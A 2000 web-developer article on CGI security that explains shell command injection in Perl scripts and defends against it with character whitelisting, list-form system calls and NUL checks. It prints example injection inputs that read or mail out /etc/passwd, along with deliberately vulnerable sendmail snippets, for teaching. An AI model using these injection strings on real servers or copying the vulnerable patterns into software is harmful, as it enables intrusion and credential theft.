WebDevelopersJournal.com: Tips on Web Page Design, HTML and Graphics

Watch Out For CGI Gangsters

by Kevin Townsend

CGI security

Think of it like this. Your server is your bank, where you keep all your valuables. The Internet and its browsers are the street, populated mostly by law abiding customers, plus a few dangerous gangsters. CGI provides the door between the street and the bank. You need to keep it open to let in customers, but not open wide enough to let the gangsters stroll in.
January 4, 2000

CGI remains the most common method of creating dynamic Web pages. It's also the most common means of attacking a Web server. The basic problem is that CGI programming is relatively easy and quick. It tempts companies into using staff who may be less experienced than those they assign to their mission critical applications; and it even seduces experienced programmers into being less careful than they should. But as commerce moves onto the Internet, CGI is itself becoming mission critical.

The term CGI has come to imply any program written to the CGI specification - but of course, CGI is just the specification, not the program. The program itself can be written in any of many different languages, with Perl and C being the most popular.

CGI provides the means of passing instructions from customers to server-based applications, which can then take the relevant action and send back the relevant information. On most occasions this will be perfectly legitimate: "please tell me how much I have in my account". But in some cases the instruction will come from the bad guys: "hand over the keys", or "destroy that account". As a CGI programmer, your task is to let in and serve the customers while defeating the attentions of the gangsters.

So where's the problem?
Most CGI programs accept input from the user via the standard HTML Form. The genuine user enters what is required and presses the submit button. But a malicious user might add extra characters that can have undesirable effects. It's not a new or unknown problem. RFC 1738, December 1994, has a list of what Berners-Lee terms 'unsafe characters'. He is specifically referring to URL constructions, but his observations hold for CGI applications too, especially as they often ask for URLs.

"The URL scheme does not in itself pose a security threat… (But) a URL-related security threat is that it is sometimes possible to construct a URL such that an attempt to perform a harmless idempotent operation such as the retrieval of the object will in fact cause a possibly damaging remote operation to occur…"

For example, a Form might ask for a URL with the intention of pointing the Browser to that URL. A malicious user could enter the URL but append the encoded newline character '%0a' and thereby also request a copy of /etc/passwd from the server:

http://www.something.mil/cgi-bin/query?%0a/bin/cat%20/etc/passwd

It is such characters that provide much of CGI's insecurity. A user is invited to input a request which may be a data variable or a command into a field in a form on a Web page. This is then sent to the server, where it is extracted and passed to the application.
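
To see why the '%0a' in the URL above matters, it helps to look at the query string after percent-decoding. The following is a minimal sketch, not a full CGI parser: url_decode is a hypothetical helper written for this illustration, and a real CGI library would do more (for example, turning '+' into a space).

```perl
use strict;
use warnings;

# Hypothetical helper: percent-decode a raw query string, roughly as a
# CGI library would before handing the value to the script.
sub url_decode {
    my ($raw) = @_;
    (my $decoded = $raw) =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $decoded;
}

# The query string from the example URL.
my $query = url_decode('%0a/bin/cat%20/etc/passwd');

# The decoded value starts with a newline. If it ever reaches a shell,
# the newline ends the intended command and the rest is a new one.
print "decoded input contains a newline\n" if $query =~ /\n/;
```

Nothing here is executed by a shell; the point is only that the decoded value is no longer a harmless single token.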

This should, of course, be fine - provided that the user has input what the application expects to receive. But a strength of some systems is their ability to process multiple commands on a single line. So, if the user enters the expected data, follows it with, say, a semi-colon (;) and then adds a destructive command, we have the potential for serious problems.

One oft-quoted example uses the scenario of a Perl and C mix (by no means uncommon) at the server. The HTML form asks the user to input his e-mail address. This is processed by a simple Perl routine:

$mail_to = &get_name_from_input; # read the user's mail address from the form
open (MAIL,"| /usr/lib/sendmail $mail_to");
print MAIL "To: $mail_to\…

The malicious user may or may not know the code of this routine - but he tries his luck anyway, entering first a nonsense address (or someone else's) and then

;mail me@realaddress.org</etc/passwd;

Because the Perl routine uses a piped open() call, the shell receives this as

/usr/lib/sendmail nonsense@notrealaddress.com; mail me@realaddress.org</etc/passwd

So the nonsense address gets what you intended to send, and me@realaddress.org gets the content of your password file.
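
The effect can be reproduced safely by building the command string and printing it rather than running it. This is only a sketch: splitting on the semicolon is a crude stand-in for what a real shell does, and the addresses are the ones used in the example above.

```perl
use strict;
use warnings;

# The form value from the example: a throwaway address followed by an
# injected command. Single quotes keep Perl from interpolating the '@'.
my $mail_to = 'nonsense@notrealaddress.com; mail me@realaddress.org</etc/passwd';

# The same string the piped open() would hand to the shell. It is only
# printed here, never executed.
my $command = "/usr/lib/sendmail $mail_to";

# Rough approximation of the shell's view: ';' separates commands.
my @shell_commands = split /\s*;\s*/, $command;
print "$_\n" for @shell_commands;
```

The second line printed is a complete command of the attacker's choosing, which is exactly what the script never intended to run.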

This problem is not limited to piped open() commands. For example, a simple Perl script such as

system("/usr/bin/sendmail -t $mailto_address < $input_file");

looks innocuous enough but is vulnerable in exactly the same way. A semicolon allows the malicious user to request a copy of /etc/passwd (or whatever). Your CGI application has invited the bad guy in, and turned him loose on your server.

In general, any CGI script that passes user input to a UNIX system() call with just a single argument will provide a doorway into the system. At such times a separate shell is forked to handle the request, and that shell interprets anything appended to the input as further commands, with unexpected results.
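
The converse is worth spelling out: when Perl's system() or piped open() is given a list of arguments instead of one string, the program is started directly and no shell parses the input. The sketch below assumes a UNIX-like host and a reasonably modern Perl; run_without_shell is a hypothetical helper, and a Perl one-liner stands in for sendmail so that the example can be run anywhere.

```perl
use strict;
use warnings;

# Run a command given as a LIST and return its output. With the list
# form of a piped open(), Perl executes the program directly, so no
# shell ever parses the arguments.
sub run_without_shell {
    my (@cmd) = @_;
    open(my $out, '-|', @cmd) or die "cannot run $cmd[0]: $!";
    my $text = do { local $/; <$out> };
    close($out) or die "$cmd[0] failed: $?";
    return $text;
}

# Hypothetical hostile form value, in the style of the earlier examples.
my $mail_to = 'nonsense@notrealaddress.com; echo INJECTED';

# Stand-in for sendmail: a one-liner run by the current interpreter
# ($^X) that reports how many arguments it received.
my @cmd = ($^X, '-e', 'print scalar(@ARGV), " argument: $ARGV[0]\n"', $mail_to);

print run_without_shell(@cmd);
```

The child program receives the whole hostile value as one argument, semicolon included, and the appended command is never run. This removes the shell from the picture; it does not make the input itself trustworthy, so it complements input checking rather than replacing it.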

What's the solution?
The solution revolves around four fundamental rules:

1. Check your server and make sure that you haven't got any 'free' CGI scripts that you no longer use.

2. Trust nobody and nothing - but do it with a smile. The smile is easy; it's how you design your Web page interface. The good-guy users will never know that you have built distrust into the application itself.

3. Don't be lazy. Take all the necessary steps to sanitize the input.

4. And then use a commercial vulnerability scanner.

Take the first rule. It's surprising how often webmasters download CGI scripts and then leave them lying around. You may not even be aware of them. They could have been put there by your predecessor. And many have vulnerabilities.

The Internet Auditing Project, run in 1998 and published earlier this year (using a scanner called BASS), looked for 18 well-known CGI vulnerabilities. We won't go into details, but to illustrate the point, consider COUNT.CGI (one of the most widely used Web page access counters). CERT released its warning advisory in November 1997 and the author rapidly produced a new version addressing the issue. But in the summer of 1999, The Internet Auditing Project still found 86,165 servers with the compromised program.

The second and third rules go together. The third, sanitize all user input, is necessary because of the second, trust nobody.

Sanitizing user input
The problem is caused by the malicious user's ability to include metacharacters in the input. Since you don't know when (rather than just 'if') this will happen, you need to sanitize all input all the time.

There are two approaches. You can disallow all metacharacters; or you can specifically allow acceptable characters. The first seems to be the obvious choice since it's a single operation and can save time. But there are problems.

The WWW Security FAQ defines metacharacters as:

&;`'\"|*?~<>^()[]{}$\n\r

but then has to add the comment: "Notice that it contains the carriage return and newline characters, something that someone at NCSA forgot when he or she wrote the widely-distributed util.c library as an example of CGI scripting in C." That's the danger. You cannot be totally certain that you are covering all metacharacters for all shells for all time - or that other characters might not be found to create other problems.

And there's another problem.

.rain.forest.puppy has written an excellent (and worrying) paper on Perl/CGI problems. The author points out that the Perl escape code for these metacharacters is

s/([\&;\`'\\\|"*?~<>^\(\)\[\]\{\}\$\n\r])/\\$1/g;

and then adds that in all these backslashes, escaping the backslash itself is frequently omitted. So don't be lazy (Rule 3!); the best approach is to include acceptable rather than exclude unacceptable.

How? Well, given Perl's excellent regular expression handling and text manipulation capabilities, an easy and effective method is to change every character that is not on the acceptable list into an underscore:

$OK_CHARS='-a-zA-Z0-9_.@'; # A restrictive list of acceptable characters
s/[^$OK_CHARS]/_/go;       # Replace every other character in $_ with an underscore

This needs to be done for each input, and the OK characters may need to change depending on the type of input (a relevant RFC would be a good starting point).
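
One way to apply this to each input with its own list is sketched below. The field names and the 'phone' character list are assumptions made for the illustration, not taken from any RFC, and sanitize is a hypothetical helper.

```perl
use strict;
use warnings;

# Hypothetical per-field lists of acceptable characters. Each should
# be adjusted to match the relevant RFC or local rule.
my %OK_CHARS = (
    email => '-a-zA-Z0-9_.@',
    phone => '-0-9+ ',
);

# Replace every character that is not on the field's list with '_'.
sub sanitize {
    my ($field, $value) = @_;
    my $ok = $OK_CHARS{$field} or die "no character list for field '$field'";
    (my $clean = $value) =~ s/[^$ok]/_/g;
    return $clean;
}

print sanitize(email => 'me@realaddress.org</etc/passwd;'), "\n";
# prints: me@realaddress.org__etc_passwd_
```

Refusing to guess at an unknown field (the die) follows the same rule as the rest of the article: anything not explicitly expected is rejected.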

But there is still one more character we need to exclude: the NUL. Perl allows NULs as data within a variable. C does not; in C the NUL is the string terminator. So, on a server that mixes Perl and C, it is just possible that you may have a vulnerability. If you exclude specific actions based on a particular string, the user could add a NUL, effectively creating different strings for Perl and C and potentially bypassing your exclusion. It could cause unexpected results - and unexpected results must be eliminated.
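
The mismatch is easy to demonstrate without any C code at all. In this sketch the input value and the '.html' suffix check are hypothetical, and the C side is only simulated by cutting the string at the first NUL, which is where a C string routine would stop reading.

```perl
use strict;
use warnings;

# Hypothetical hostile value: a NUL byte hidden before a harmless suffix.
my $input = "passwd\0.html";

# Perl sees the whole string, so a check for a ".html" suffix passes.
my $perl_accepts = $input =~ /\.html\z/ ? 1 : 0;

# A C routine would treat the first NUL as the end of the string.
my ($as_c_sees_it) = split /\0/, $input, 2;

# Simplest defence: refuse any input that contains a NUL at all.
sub has_nul {
    my ($value) = @_;
    return index($value, "\0") >= 0;
}

print "Perl check passed: $perl_accepts\n";
print "C would see: $as_c_sees_it\n";
print "rejected: input contains NUL\n" if has_nul($input);
```

A list of acceptable characters that does not include the NUL rejects it as a matter of course, which is one more argument for allowing known-good characters rather than excluding known-bad ones.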

Let's finish with a reminder of our fundamental rules. Make sure you don't have any residual CGIs on your system; don't trust the input to be what you expect, and sanitize, sanitize, sanitize. Then use a commercial vulnerability scanner.

An Oxford graduate in English Language and Literature, Kevin Townsend has spent his adult career trying to reconcile the differences between Computer Language and English Literature. He specialises in writing about data security in general and the Internet in particular, and has been editor of various specialist security magazines.